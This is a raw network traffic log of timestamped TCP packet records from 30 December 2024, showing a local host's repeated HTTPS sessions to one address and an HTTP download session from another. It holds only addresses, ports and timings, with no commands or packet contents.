Dec 30, 2024 15:52:59.059696913 CET	49730	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:52:59.059740067 CET	443	49730	104.21.96.1	192.168.2.4
Dec 30, 2024 15:52:59.059825897 CET	49730	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:52:59.062966108 CET	49730	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:52:59.062978983 CET	443	49730	104.21.96.1	192.168.2.4
Dec 30, 2024 15:52:59.535029888 CET	443	49730	104.21.96.1	192.168.2.4
Dec 30, 2024 15:52:59.535099983 CET	49730	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:52:59.573682070 CET	49730	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:52:59.573703051 CET	443	49730	104.21.96.1	192.168.2.4
Dec 30, 2024 15:52:59.573971033 CET	443	49730	104.21.96.1	192.168.2.4
Dec 30, 2024 15:52:59.623872995 CET	49730	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:52:59.673098087 CET	49730	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:52:59.673126936 CET	49730	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:52:59.673183918 CET	443	49730	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:01.123891115 CET	49675	443	192.168.2.4	173.222.162.32
Dec 30, 2024 15:53:18.694523096 CET	80	49723	217.20.57.20	192.168.2.4
Dec 30, 2024 15:53:18.694690943 CET	49723	80	192.168.2.4	217.20.57.20
Dec 30, 2024 15:53:18.694730043 CET	49723	80	192.168.2.4	217.20.57.20
Dec 30, 2024 15:53:18.699526072 CET	80	49723	217.20.57.20	192.168.2.4
Dec 30, 2024 15:53:19.630496979 CET	443	49730	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:19.630597115 CET	443	49730	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:19.630672932 CET	49730	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:19.689579010 CET	49730	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:19.689610958 CET	443	49730	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:19.689625978 CET	49730	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:19.689632893 CET	443	49730	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:19.823609114 CET	49737	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:19.823662996 CET	443	49737	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:19.823754072 CET	49737	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:19.824160099 CET	49737	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:19.824181080 CET	443	49737	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:20.299541950 CET	443	49737	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:20.299626112 CET	49737	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:20.303867102 CET	49737	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:20.303880930 CET	443	49737	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:20.304126024 CET	443	49737	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:20.313905954 CET	49737	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:20.313940048 CET	49737	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:20.313982010 CET	443	49737	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:20.760651112 CET	443	49737	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:20.760698080 CET	443	49737	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:20.760767937 CET	49737	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:20.760803938 CET	443	49737	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:20.765300989 CET	443	49737	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:20.765331030 CET	443	49737	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:20.765357018 CET	49737	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:20.765368938 CET	443	49737	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:20.765419006 CET	49737	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:20.769974947 CET	443	49737	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:20.770059109 CET	443	49737	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:20.770090103 CET	443	49737	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:20.770103931 CET	49737	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:20.770114899 CET	443	49737	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:20.770155907 CET	49737	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:20.770164013 CET	443	49737	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:20.774682999 CET	443	49737	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:20.774743080 CET	49737	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:20.774753094 CET	443	49737	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:20.827130079 CET	49737	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:20.847162962 CET	443	49737	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:20.847223997 CET	443	49737	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:20.847253084 CET	443	49737	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:20.847348928 CET	443	49737	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:20.847374916 CET	49737	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:20.847407103 CET	49737	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:20.847534895 CET	49737	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:20.847556114 CET	443	49737	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:20.847570896 CET	49737	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:20.847578049 CET	443	49737	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:21.236346006 CET	49738	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:21.236397982 CET	443	49738	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:21.236485004 CET	49738	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:21.236793041 CET	49738	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:21.236805916 CET	443	49738	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:21.692691088 CET	443	49738	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:21.692773104 CET	49738	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:21.694086075 CET	49738	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:21.694099903 CET	443	49738	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:21.694339991 CET	443	49738	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:21.695560932 CET	49738	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:21.695707083 CET	49738	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:21.695735931 CET	443	49738	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:21.695801973 CET	49738	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:21.695808887 CET	443	49738	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:22.429327965 CET	443	49738	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:22.429444075 CET	443	49738	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:22.429512024 CET	49738	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:22.432533026 CET	49738	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:22.432550907 CET	443	49738	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:22.909470081 CET	49739	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:22.909506083 CET	443	49739	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:22.909574032 CET	49739	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:22.910136938 CET	49739	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:22.910151958 CET	443	49739	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:23.362580061 CET	443	49739	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:23.362663031 CET	49739	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:23.364006996 CET	49739	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:23.364020109 CET	443	49739	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:23.364248991 CET	443	49739	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:23.365547895 CET	49739	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:23.365741014 CET	49739	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:23.365775108 CET	443	49739	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:23.942349911 CET	443	49739	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:23.942465067 CET	443	49739	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:23.942553043 CET	49739	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:23.942717075 CET	49739	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:23.942738056 CET	443	49739	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:24.189721107 CET	49740	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:24.189755917 CET	443	49740	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:24.189830065 CET	49740	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:24.190128088 CET	49740	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:24.190143108 CET	443	49740	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:24.665621042 CET	443	49740	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:24.665715933 CET	49740	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:24.667247057 CET	49740	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:24.667253971 CET	443	49740	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:24.667491913 CET	443	49740	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:24.668930054 CET	49740	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:24.669065952 CET	49740	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:24.669100046 CET	443	49740	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:24.669163942 CET	49740	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:24.669173956 CET	443	49740	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:25.306505919 CET	443	49740	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:25.306598902 CET	443	49740	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:25.306652069 CET	49740	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:25.307077885 CET	49740	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:25.307087898 CET	443	49740	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:26.248790979 CET	49741	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:26.248856068 CET	443	49741	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:26.248958111 CET	49741	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:26.249403954 CET	49741	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:26.249417067 CET	443	49741	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:26.726538897 CET	443	49741	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:26.726634979 CET	49741	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:26.727902889 CET	49741	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:26.727921963 CET	443	49741	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:26.728121042 CET	443	49741	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:26.729228020 CET	49741	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:26.729314089 CET	49741	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:26.729324102 CET	443	49741	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:27.186387062 CET	443	49741	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:27.186492920 CET	443	49741	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:27.186564922 CET	49741	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:27.186933041 CET	49741	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:27.186949015 CET	443	49741	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:27.702657938 CET	49742	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:27.702687979 CET	443	49742	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:27.702774048 CET	49742	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:27.703330994 CET	49742	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:27.703341961 CET	443	49742	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:28.169791937 CET	443	49742	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:28.169920921 CET	49742	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:28.197688103 CET	49742	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:28.197706938 CET	443	49742	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:28.197969913 CET	443	49742	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:28.201937914 CET	49742	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:28.202878952 CET	49742	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:28.202914953 CET	443	49742	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:28.203244925 CET	49742	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:28.203282118 CET	443	49742	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:28.204360962 CET	49742	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:28.204412937 CET	443	49742	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:28.204581022 CET	49742	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:28.204611063 CET	443	49742	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:28.204804897 CET	49742	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:28.204835892 CET	443	49742	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:28.205001116 CET	49742	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:28.205029964 CET	443	49742	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:28.205032110 CET	49742	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:28.205044985 CET	443	49742	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:28.205260992 CET	49742	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:28.205286026 CET	443	49742	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:28.205298901 CET	49742	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:28.205513954 CET	49742	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:28.205545902 CET	49742	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:28.211922884 CET	443	49742	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:28.212654114 CET	49742	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:28.212680101 CET	443	49742	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:28.212701082 CET	49742	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:28.212750912 CET	49742	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:28.212771893 CET	49742	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:28.213629007 CET	443	49742	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:32.543346882 CET	443	49742	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:32.543431997 CET	443	49742	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:32.543495893 CET	49742	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:32.543792009 CET	49742	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:32.543802977 CET	443	49742	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:32.577584982 CET	49743	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:32.577601910 CET	443	49743	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:32.577709913 CET	49743	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:32.578047991 CET	49743	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:32.578057051 CET	443	49743	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:33.072109938 CET	443	49743	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:33.072309017 CET	49743	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:33.073774099 CET	49743	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:33.073791027 CET	443	49743	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:33.074034929 CET	443	49743	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:33.075390100 CET	49743	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:33.075427055 CET	49743	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:33.075462103 CET	443	49743	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:33.553885937 CET	443	49743	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:33.553991079 CET	443	49743	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:33.554064035 CET	49743	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:33.554291010 CET	49743	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:33.554310083 CET	443	49743	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:33.554322958 CET	49743	443	192.168.2.4	104.21.96.1
Dec 30, 2024 15:53:33.554327965 CET	443	49743	104.21.96.1	192.168.2.4
Dec 30, 2024 15:53:33.557379007 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:33.562280893 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:33.562375069 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:33.567317963 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:33.572038889 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.267288923 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.267302990 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.267321110 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.267390013 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.267422915 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.267433882 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.267438889 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.267513037 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.267513990 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.267524958 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.267535925 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.267548084 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.267559052 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.267585039 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.272211075 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.272290945 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.272356987 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.397150040 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.397161961 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.397208929 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.397218943 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.397263050 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.397274971 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.397300959 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.397325039 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.397336960 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.397367001 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.398083925 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.398127079 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.398128986 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.398142099 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.398180962 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.398185968 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.398197889 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.398240089 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.398981094 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.398992062 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.399004936 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.399030924 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.399050951 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.399064064 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.399096012 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.399892092 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.399912119 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.399931908 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.399934053 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.399943113 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.399955988 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.399979115 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.400012970 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.483875036 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.527153015 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.527165890 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.527178049 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.527209997 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.527231932 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.528237104 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.528261900 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.528300047 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.528306961 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.528393030 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.528403997 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.528429985 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.528583050 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.528601885 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.528626919 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.528851032 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.528891087 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.528892040 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.528902054 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.528949022 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.529108047 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.529165030 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.529175043 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.529201031 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.529294014 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.529309988 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.529320955 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.529334068 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.529342890 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.529345989 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.529366970 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.529405117 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.530069113 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.530113935 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.530126095 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.530178070 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.530203104 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.530213118 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.530225039 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.530236959 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.530245066 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.530286074 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.530857086 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.530884981 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.530901909 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.530904055 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.530936956 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.530968904 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.530980110 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.530991077 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.531002045 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.531018972 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.531040907 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.531069994 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.532236099 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.532247066 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.532258987 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.532269955 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.532282114 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.532282114 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.532291889 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.532303095 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.532310963 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.532315016 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.532336950 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.532361031 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.532783031 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.532833099 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.570611000 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.570622921 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.570643902 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.570669889 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.613851070 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.613898993 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:34.656941891 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.656965971 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:34.656977892 CET	80	49744	185.215.113.16	192.168.2.4
